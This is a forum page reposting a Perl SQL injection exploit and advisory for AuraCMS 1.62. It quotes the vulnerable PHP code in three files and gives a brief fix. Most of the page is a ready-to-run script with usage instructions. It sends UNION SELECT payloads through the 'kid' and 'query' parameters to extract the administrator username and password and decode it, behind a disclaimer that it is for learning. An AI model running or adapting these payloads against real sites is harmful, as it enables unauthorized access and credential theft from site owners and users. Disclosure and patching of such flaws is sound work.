|
|
|
|
Online Now: 4 0 Members | 4 Guests |
|
|
|
|
|
|
Copy & paste Coding Dibawah ini Untuk Banner kami ================================== <a href="http://www.sekuritionline.net/" target="_blank"><img src= "http://www.sekuritionline.net/ banner/banner.gif" width="125" height="75" alt="sekuritionline.net" title="SO-Te@m" border="0" /></a> |
|
|
|
|
|
|
| -------------------------------- |
|
|
|
|
|
|
|
| January 26, 2009, 5:51 pm |
|
|
|
|
By fl3xu5
Published: February 20, 2008
Print
Email
[quote="fl3xu5"]#!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # AuraCMS 1.62 Multiple Remote SQL Injection Exploit # Waktu : Feb 15 2008 01:00PM # Software : AuraCMS # Versi : 1.62 # Vendor : http://www.auracms.org/ # # ------------------------------------ # Audit Oleh : NTOS-Team [fl3xu5, k1tk4t, opt1lc] # Lokasi : Indonesia | http://newhack.org # Penjelasan : # # => Kutu pada berkas /mod/dl.php # --//-- # 8. $aksi=$_GET[aksi]; # 9. $laporan=$_GET[laporan]; # 10. $kategori=$_GET[kategori]; if(!$kategori) $kategori=$_POST[kategori]; # 11. $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid]; # 12. $id=$_GET[id]; if(!$id) $id=$_POST[id]; # 13. $submit=$_POST[submit]; # 14. $mulai=$_GET[mulai]; # 15. $hal=$_GET[hal]; # 16. $brokens=$_GET[brokens]; # --//-- # 59.if ($aksi=="lihat" { # 60. # 61.$numresult = mysql_query("SELECT * FROM dl WHERE kid='$kid' AND tipe='aktif' ORDER BY id DESC" ; # 62. # 63.$jmlrec = mysql_num_rows($numresult); # --//-- # jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "kid" # Contoh; # http://site.korban/auracms162/index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI] # # => Kutu pada berkas /mod/links.php # --//-- # 8. $aksi=$_GET[aksi]; # 9. $kategori=$_GET[kategori]; if(!$kategori) $kategori=$_POST[kategori]; # 10. $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid]; # 11. $id=$_GET[id]; if(!$id) $id=$_POST[id]; # 12. $submit=$_POST[submit]; # 13. $mulai=$_GET[mulai]; # 14. $hal=$_GET[hal]; # 15. $brokens=$_GET[brokens]; # 16. $laporan=$_GET[laporan]; # --//-- # 59.if ($aksi=="lihat" { # 60. # 61.$numresult = mysql_query("SELECT * FROM links WHERE kid='$kid' AND tipe='aktif' ORDER BY id DESC" ; # 62. # 63.$jmlrec = mysql_num_rows($numresult); # --//-- # jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "kid" # Contoh; # http://site.korban/auracms162/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI] # # => Kutu pada berkas /search.php # --//-- # 8. $query=$_GET[query]; # --//-- # 19. $perintah="SELECT * FROM artikel WHERE ((judul LIKE '%$query%' OR konten LIKE '%$query%' OR user LIKE '%$query%' AND publikasi=1)"; # 20. $hasil=mysql_query($perintah, $koneksi_db); # 21. $jumlah1=mysql_numrows($hasil); # 22. # 23. $perintah="SELECT * FROM halaman WHERE (judul LIKE '%$query%' OR konten LIKE '%$query%' "; # 24. $hasil=mysql_query($perintah, $koneksi_db); # 25. $jumlah2=mysql_numrows($hasil); # --//-- # jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "query" # Contoh; # http://site.korban/index.php?query=t4mugel4p' [SQLI]&pilih=search # # => perbaikan sederhana # pada berkas "mod/dl.php" dan "mod/links.php" # ubah kode ; # $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid]; # menjadi # $kid=(int)$_GET[kid]; if(!$kid) $kid=(int)$_POST[kid]; # dan buat magic_quotes_gpc = on pada server # pada berkas "/search.php" buat fungsi penyaringan "query" dan hidupkan magic_quotes_gpc # # => Perhatian! # "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari" # Segela penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami # # =>Newhack Technology, OpenSource & Security # ~ NTOS-Team->[fl3xu5,k1tk4t,opt1lc] ~ use LWP::UserAgent; use Getopt::Long; use MIME::Base64;
if(!$ARGV[2]) { print "\n |-------------------------------------------------------|"; print "\n | Indonesian Newhack Technology |"; print "\n |-------------------------------------------------------|"; print "\n | AuraCMS 1.62 Multiple Remote SQL Injection Exploit |"; print "\n | Coded by NTOS-Team |"; print "\n |-------------------------------------------------------|"; print "\n[!] "; print "\n[!] Exploit Berhasil jika magic_quotes_gpc = off pada server"; print "\n[!] Penggunaan : perl aura162sqli.pl [Site] [Path] [Option]"; print "\n[!] [Option] 1 = dl.php | 2 = links.php | 2 = search.php "; print "\n[!] Contoh : perl aura162sqli.pl localhost /aura162/ -o 1"; print "\n[!] "; print "\n"; exit; } $site = $ARGV[0]; # Site Target $path = $ARGV[1]; # Path direktori vKios
%options = (); GetOptions(\%options, "o=i",); if($options{"o"} && $options{"o"} == 1) { $sql
=
"http://".$site.$path."index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*";
} if($options{"o"} && $options{"o"} == 2) { $sql
=
"http://".$site.$path."index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*";
} if($options{"o"} && $options{"o"} == 3) { $sql = "http://".$site.$path."index.php?query=1nj3ks1' union+select+0,concat(0x74346d7520,user,0x20673074),concat(0x67656c347020,password,0x20673074)+from+user+limit+0,1/*&pilih=search";
}
$www = new LWP::UserAgent; print "\n\n [!] Injeksi SQL \n"; $res = $www -> get($sql) or err(); $hasil = $res -> content; if( $hasil =~ /t4mu (.*?) g0t/ ) { print "\n [+] Username : $1"; $hasil =~ /gel4p (.*?) g0t/ , print "\n [+] Password : $1"; print "\n [+] base64 decode : "; print decode_base64($1); print "\n\n" } else { print "\n [-] Exploit gagal - magic_quotes_gpc = on"; exit(); }
# milw0rm.com [2008-02-16][/quote]
View Comments (0)
|
|
|
|
|
Sorry, your account does not have access to post comments.